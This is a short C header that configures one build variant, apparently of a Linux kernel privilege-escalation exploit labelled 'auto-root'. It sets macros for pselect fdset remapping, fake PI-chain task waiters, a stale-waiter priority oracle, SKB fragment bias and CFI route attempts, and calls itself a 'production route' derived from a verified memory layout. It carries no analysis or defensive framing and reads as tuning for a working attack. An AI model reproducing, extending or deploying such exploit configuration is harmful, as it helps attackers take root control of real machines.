#include "../sh53d-prewake-linearmap-auto-sweep/target.h"

#undef BUILD_VARIANT_LABEL
#define BUILD_VARIANT_LABEL "sh53d-prewake-linearmap-auto-root"

/* Production route derived from the verified shift-4 result-fdset layout. */
#undef PSELECT_VALIDATE_ONLY
#define PSELECT_VALIDATE_ONLY 0
#undef PSELECT_TCP_WAIT_POLLOUT
#define PSELECT_TCP_WAIT_POLLOUT 0
#define PSELECT_TCP_OOB_FIRST 1
#undef PSELECT_BLOCK_WRITE_FDSET
#define PSELECT_BLOCK_WRITE_FDSET 0
#define PSELECT_FOPS_PI_TREE_WRITE 0
#define PSELECT_REMAP_WRITE_FDS 1
#define SKB_FRAG_BIAS 0x40
#define FOPS_LOCK_ROOT_CURRENT_STACK_WAITER 0
#define FOPS_FAKE_TASK_PI_TOP_WAITER 1
#define FOPS_FAKE_TASK_TASK_GROUP 1
#define PSELECT_PRESTART_WAITER_BEFORE_FOPS 1
#undef PSELECT_STALE_WAITER_PRIO_ORACLE
/* waiter owns f_pi_chain and is PI-boosted by owner_thread: [7] writes the
 * effective priority 120, not the post-setattr normal priority 139. */
#define PSELECT_STALE_WAITER_PRIO_ORACLE 0x78UL
#undef PERF_CURRENT_TASK_WAITER
#define PERF_CURRENT_TASK_WAITER 1
#undef PERF_CURRENT_STACK_WAITER
#define PERF_CURRENT_STACK_WAITER 0
#undef PSELECT_TCP_OOB_LEAF_DIAG
#define PSELECT_TCP_OOB_LEAF_DIAG 0
#undef PSELECT_STALE_TREE_SELF_TARGET_DIAG
#define PSELECT_STALE_TREE_SELF_TARGET_DIAG 0
#undef PSELECT_PAIRED_LOCK_BASE_DIAG
#define PSELECT_PAIRED_LOCK_BASE_DIAG 0
#undef FOPS_SELF_TARGET_DIAG
#define FOPS_SELF_TARGET_DIAG 0
#undef FOPS_RECLAIM_OWNERLESS_DIAG
#define FOPS_RECLAIM_OWNERLESS_DIAG 0
#undef FOPS_RECLAIM_MUTATION_DIAG
#define FOPS_RECLAIM_MUTATION_DIAG 1
#undef FOPS_RECLAIM_MUTATION_DIAG_CONTINUE_CFI
#define FOPS_RECLAIM_MUTATION_DIAG_CONTINUE_CFI 1
#undef PSELECT_CFI_ROUTE_ATTEMPTS
#define PSELECT_CFI_ROUTE_ATTEMPTS 1
